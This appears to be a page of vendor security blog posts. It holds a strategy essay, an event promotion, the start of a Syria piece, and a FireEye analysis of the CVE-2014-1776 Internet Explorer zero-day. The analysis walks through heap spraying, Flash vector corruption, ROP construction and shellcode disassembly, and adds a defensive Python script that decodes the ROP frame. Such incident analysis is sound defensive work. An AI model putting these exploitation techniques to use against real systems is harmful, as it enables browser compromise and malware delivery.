Introduction to Strategic Thought

I plan to address strategic thought as applied to digital security in a series of posts. Here I would like to briefly introduce the concept and offer a simple example.

Joint Publication 1 (JP-1), Doctrine for the Armed Forces of the United States, helps illuminate the strategic approach to digital security. JP-1 defines three levels of warfare: strategic, operational and tactical. Above the strategic level one can place the overall goal of the digital security program, as one might place the overall goal of a military or political endeavor. Below the tactical level one can similarly place tools or technology – the weapons one might employ when conducting tactical maneuvers. Taken as a whole, the five levels appear as shown in Figure 1.

Figure 1. Five Levels of Strategic Security


Using a strategic security framework enables a digital defender to build a more effective and durable program. A strategic security system doesn’t start with tools and tactics; instead, it begins by setting one or more overall mission goals. The strategy-minded chief information security officer (CISO) obtains executive buy-in to those goals, which works at a level understood by technicians and non-technicians alike. Next the CISO develops strategies to implement those goals, organizes and runs campaigns and operations to support the strategies, helps his or her team use tactics to realize the campaigns and operations, and procures tools and technology to equip the team.

Figure 2 shows an example of one strategic security approach to minimize loss due to intrusions, using a strategy of rapid detection, response, and containment, along with network security monitoring-inspired operations/campaigns, tactics and tools.

Figure 2. Five Levels of Strategic Security Example


Most security professionals – and by association policymakers and leaders taking advice from those practitioners and engineers – fixate on the tools, and to a lesser degree, the tactics of the digital security problem. Goals, strategies and campaigns aren’t usually a consideration because technicians, administrators, programmers and the like spend their time working with tools. The extent of their tactical involvement is thinking about creative ways to use their tools. The communities that tend to think in terms of goals, strategies and campaigns – think tanks, policy analysts and so on – have traditionally not engaged with the technicians to bring the entire strategic security approach to bear on modern challenges.

As shown in Figure 2, “detecting intruders” is actually shorthand for a rich strategic security program – one whose goal is minimizing loss through a strategy of rapid incident detection, response and containment. Security teams run operations to match threat intelligence against security event data and hunt for novel intruders as needed. They tactically collect, analyze, escalate and resolve incidents and the related data using tools suited for those functions.

It is crucial, however, that the ultimate goals and strategy remained linked with the tools at the bottom of the process. If that chain decouples, the outcome could be disastrous, where technical reality makes strategic theory obsolete. For example, a program built on monitoring the network will fail if all network traffic is encrypted. The tools at the bottom of the process will not be able to “see” the contents of network traffic and will be less effective when trying to identify suspicious and malicious activity. In this dysfunctional case, the tools’ inability to deliver required data to the personnel conducting tactical endeavors and operational campaigns will prevent the program goal from being achieved.

In future posts, I will elaborate on these concepts to demonstrate how they improve enterprise security.

Note: This post is adapted from a research paper by the author, published through The Brookings Institution as Strategy, Not Speed: What Today’s Digital Defenders Must Learn From Cybersecurity’s Early Thinkers.

New Zero-Day Exploit targeting Internet Explorer Versions 9 through 11 Identified in Targeted Attacks

Summary

FireEye Research Labs identified a new Internet Explorer (IE) zero-day exploit used in targeted attacks. The vulnerability affects IE6 through IE11, but the attack is targeting IE9 through IE11. This zero-day bypasses both ASLR and DEP. Microsoft has assigned CVE-2014-1776 to the vulnerability and released a security advisory to track this issue.

Threat actors are actively using this exploit in an ongoing campaign which we have named “Operation Clandestine Fox.” However, for many reasons, we will not provide campaign details. But we believe this is a significant zero-day, as the vulnerable versions represent about a quarter of the total browser market. We recommend applying a patch once available.

According to NetMarket Share, the market share for the targeted versions of IE in 2013 was:

IE 9 13.9%
IE 10 11.04%
IE 11 1.32%

Collectively, in 2013, the vulnerable versions of IE accounted for 26.25% of the browser market. The vulnerability, however, does appear in IE6 through IE11 though the exploit targets IE9 and higher.

The Details

The exploit leverages a previously unknown use-after-free vulnerability, and uses a well-known Flash exploitation technique to achieve arbitrary memory access and bypass Windows’ ASLR and DEP protections.

Exploitation

• Preparing the heap

The exploit page loads a Flash SWF file to manipulate the heap layout with the common technique heap feng shui. It allocates Flash vector objects to spray memory and cover address 0x18184000. Next, it allocates a vector object that contains a flash.Media.Sound() object, which it later corrupts to pivot control to its ROP chain.

• Arbitrary memory access

The SWF file calls back to JavaScript in IE to trigger the IE bug and overwrite the length field of a Flash vector object in the heap spray. The SWF file loops through the heap spray to find the corrupted vector object, and uses it to again modify the length of another vector object. This other corrupted vector object is then used for subsequent memory accesses, which it then uses to bypass ASLR and DEP.

• Runtime ROP generation

With full memory control, the exploit will search for ZwProtectVirtualMemory, and a stack pivot (opcode 0x94 0xc3) from NTDLL. It also searches for SetThreadContext in kernel32, which is used to clear the debug registers. This technique, documented here, may be an attempt to bypass protections that use hardware breakpoints, such as EMET’s EAF mitigation.

With the addresses of the aforementioned APIs and gadget, the SWF file constructs a ROP chain, and prepends it to its RC4-decrypted shellcode. It then replaces the vftable of a sound object with a fake one that points to the newly created ROP payload. When the sound object attempts to call into its vftable, it instead pivots control to the attacker’s ROP chain.

• ROP and Shellcode

The ROP payload basically tries to make memory at 0x18184000 executable, and to return to 0x1818411c to execute the shellcode.

0:008> dds eax
18184100  770b5f58 ntdll!ZwProtectVirtualMemory
18184104  1818411c
18184108  ffffffff
1818410c  181840e8
18184110  181840ec
18184114  00000040
18184118  181840e4
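For analysts triaging a memory dump like the one above, it helps to read the `dds` output as what it is: a fake stack frame for ZwProtectVirtualMemory, with the return address followed by its five arguments (ProcessHandle, *BaseAddress, *RegionSize, NewProtect, *OldProtect). The following is an added example, not FireEye's code or part of the original post; it assumes exactly that frame layout, and the dump text it parses is constructed from the values quoted above. It decodes the frame and flags the three properties that make it look like a ROP stub rather than a legitimate call: the current-process pseudo-handle (-1), an executable page protection (0x40, PAGE_EXECUTE_READWRITE), and a return address sitting in the same heap region as the frame itself instead of in a code module.

```python
import re

# Constructed copy of the `dds eax` dump quoted in the post (same dwords).
DDS_DUMP = """\
18184100  770b5f58 ntdll!ZwProtectVirtualMemory
18184104  1818411c
18184108  ffffffff
1818410c  181840e8
18184110  181840ec
18184114  00000040
18184118  181840e4
"""

# Every PAGE_EXECUTE* protection constant carries one of these bits.
EXECUTE_BITS = 0x10 | 0x20 | 0x40 | 0x80

# address, dword value, optional resolved symbol
LINE_RE = re.compile(r"^([0-9a-f]{8})\s+([0-9a-f]{8})(?:\s+(\S+))?", re.I)


def parse_dds(text):
    """Return a list of (address, value, symbol_or_None) from a windbg dds dump.

    Lines that are not 'addr  value [symbol]' (such as the debugger prompt)
    are skipped.
    """
    frames = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        addr, val, sym = m.groups()
        frames.append((int(addr, 16), int(val, 16), sym))
    return frames


def decode_protect_frame(frames):
    """Interpret the first seven dwords as a NtProtectVirtualMemory frame.

    Assumed layout (a ROP chain's fake frame): slot 0 is the call target,
    slot 1 the return address, slots 2..6 the five stdcall arguments.
    """
    if len(frames) < 7:
        raise ValueError("need at least 7 dwords for target + return + 5 args")
    vals = [value for _, value, _ in frames[:7]]
    return {
        "target": frames[0][2],
        "return_address": vals[1],
        "process_handle": vals[2],
        "base_address_ptr": vals[3],
        "region_size_ptr": vals[4],
        "new_protect": vals[5],
        "old_protect_ptr": vals[6],
    }


def suspicious_reasons(frame, frame_base, window=0x1000):
    """List why a decoded frame looks like a protection-change ROP stub.

    frame_base is the address of the frame's first dword; a return address
    within `window` bytes of it means control goes back into the same
    (heap) region rather than into a loaded module.
    """
    reasons = []
    if frame["process_handle"] == 0xFFFFFFFF:
        reasons.append("ProcessHandle is the current-process pseudo-handle (-1)")
    if frame["new_protect"] & EXECUTE_BITS:
        reasons.append("NewProtect 0x%02x requests an executable page" % frame["new_protect"])
    if abs(frame["return_address"] - frame_base) < window:
        reasons.append("return address 0x%08x lies next to the frame itself, not in a module"
                       % frame["return_address"])
    return reasons


if __name__ == "__main__":
    parsed = parse_dds(DDS_DUMP)
    decoded = decode_protect_frame(parsed)
    for key, value in decoded.items():
        print("%-17s %s" % (key, hex(value) if isinstance(value, int) else value))
    for reason in suspicious_reasons(decoded, parsed[0][0]):
        print("suspicious:", reason)
```

The same decoder works for any `dds` excerpt that starts at the call target of a stdcall API; only the argument names in `decode_protect_frame` are specific to NtProtectVirtualMemory.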

Inside the shellcode, it saves the current stack pointer to 0x18181800 to safely return to the caller.

mov     dword ptr ds:[18181800h],ebp

Then, it restores the flash.Media.Sound vftable and repairs the corrupted vector object to avoid application crashes.

18184123 b820609f06      mov     eax,69F6020h
18184128 90              nop
18184129 90              nop
1818412a c700c0f22169    mov     dword ptr [eax],offset Flash32_11_7_700_261!AdobeCPGetAPI+0x42ac00 (6921f2c0)
18184133 b800401818      mov     eax,18184000h
18184138 90              nop
18184139 90              nop
1818413a c700fe030000    mov     dword ptr [eax],3FEh ds:0023:18184000=3ffffff0

The shellcode also recovers the ESP register to make sure the stack range is in the current thread stack base/limit.

18184140 8be5            mov     esp,ebp
18184142 83ec2c          sub     esp,2Ch
18184145 90              nop
18184146 eb2c            jmp     18184174

The shellcode calls SetThreadContext to clear the debug registers. It is possible that this is an attempt to bypass mitigations that use the debug registers.

18184174 57              push    edi
18184175 81ece0050000    sub     esp,5E0h
1818417b c7042410000100  mov     dword ptr [esp],10010h
18184182 8d7c2404        lea     edi,[esp+4]
18184186 b9dc050000      mov     ecx,5DCh
1818418b 33c0            xor     eax,eax
1818418d f3aa            rep stos byte ptr es:[edi]
1818418f 54              push    esp
18184190 6afe            push    0FFFFFFFEh
18184192 b8b308b476      mov     eax,offset kernel32!SetThreadContext (76b408b3)
18184197 ffd0            call    eax

The shellcode calls URLDownloadToCacheFileA to download the next stage of the payload, disguised as an image.

Mitigation

Using EMET may break the exploit in your environment and prevent it from successfully controlling your computer. EMET versions 4.1 and 5.0 break (and/or detect) the exploit in our tests.
Enhanced Protected Mode in IE breaks the exploit in our tests. EPM was introduced in IE10.
Additionally, the attack will not work without Adobe Flash. Disabling the Flash plugin within IE will prevent the exploit from functioning.

Threat Group History

The APT group responsible for this exploit has been the first group to have access to a select number of browser-based 0-day exploits (e.g. IE, Firefox, and Flash) in the past. They are extremely proficient at lateral movement and are difficult to track, as they typically do not reuse command and control infrastructure. They have a number of backdoors, including one known as Pirpi that we previously discussed here. CVE-2010-3962, then a 0-day exploit in Internet Explorer 6, 7, and 8, dropped the Pirpi payload discussed in this previous case.

As this is still an active investigation we are not releasing further indicators about the exploit at this time.

Acknowledgement: We thank Christopher Glyer, Matt Fowler, Josh Homan, Ned Moran, Nart Villeneuve and Yichong Lin for their support, research, and analysis on these findings.

InfoSecurity Europe 2014: Cybersecurity for the Masses

InfoSecurity Europe is the biggest security event and most important date on the calendar for information security professionals across Europe. The event aims to break through the noise and provide the European audience with all the necessary information to better understand cyber threats to their networks. Join FireEye experts and learn how to prepare for a new frontier of advanced attackers:

  • Visit stand J60 and check out FireEye’s Geek Bar. A certified geek will analyze your portable device to determine if you’ve received any malware. The live demonstration can prove useful to better understand and identify potential threats to your network.
  • Join FireEye Director of Technology Strategy Jason Steer, SI Technical Lead Simon Mullis, and Greg Day, EMEA CTO among others, as they discuss the threat landscape and walk attendees through interactive, educational workshops and presentations. Join us on our stand to understand the threat landscape – presentations every 30 minutes all 3 days.
  • Senior Director of Market Research at FireEye Rob Rachwald will be speaking on Wednesday, April 30, where he’ll cover the nitty gritty of sandbox evasion. Mr. Rachwald’s presentation will help the audience gain an overview of various sandboxing techniques, understand current sandbox bypass methods, as well as identify best practices to optimize malware detection.
  • Mandiant's Director, David Damato and Technical Director, Ryan Kazanciyan will be speaking on Wednesday, April 30. Drawing from the speakers’ first-hand experiences and case-studies, this presentation will highlight lessons learned from many years of responding to targeted attacks by nation state actors and other groups.
  • FireEye SVP and COO Kevin Mandia will make a special appearance on Wednesday, April 30 to discuss FireEye’s recent acquisition of Mandiant, as well as to discuss today’s changing threat landscape.
  • The FireEye team will also release the latest findings from Mandiant’s annual M-Trends report and European ATR research report. The results offer visibility into motives, approaches, and different skill levels of attackers both in Europe and around the globe.
  • Participate in FireEye’s photo contest and have the opportunity to win an Apple® gift card worth £250! Look around London and you will see FireEye branded taxis zipping around the city. Grab your camera or smart phone and take a picture of you and the taxi. Submit your photo to helena.brito@fireeye.com and your photo will be posted to FireEye’s Facebook page. You will also be automatically entered into the contest.

FireEye Taxi

Stop by Stand J60 to learn more about the newly expanded FireEye Security Platform, which integrates expertise from Mandiant and is designed to give customers one solution to go from threat alert to remediation. We’ll have live demonstrations of all the new FireEye products. In the meantime, be sure to follow @FireEye for the latest threat research and updates from the company.

We hope to see you in London the week of April 29 through May 1. If you are unable to attend, check back on the blog for interviews and insights from the conference. You can register for a free entry ticket by clicking HERE – your badge will arrive with “FireEye Guest” printed on the bottom.

Syria 1982, Syria 2013: A Tale of Two Revolutions

Today, as international intervention in the Syrian conflict is fast approaching, the phenomenon of the world’s “patriotic hackers” (see Chechnya, Kosovo, Estonia, Georgia, etc.) continues to grow, with the pro-government “Syrian Electronic Army” believed responsible for attacks on Twitter and the New York Times.

The Internet has changed everything, including our geopolitical “battlespace.” In 1982, during a previous Syrian uprising in the city of Hama, the government obliterated parts of the city with artillery fire and killed “many thousands” of civilians. But because the government had “cut all telephone and road communication with the city” (according to renowned Syria expert Robert Fisk) it was many weeks before the extent of the atrocity was discovered. I visited Hama in 1988, and the entire story was recounted to me by a complete stranger as we strolled past countless buildings strewn with bullet holes.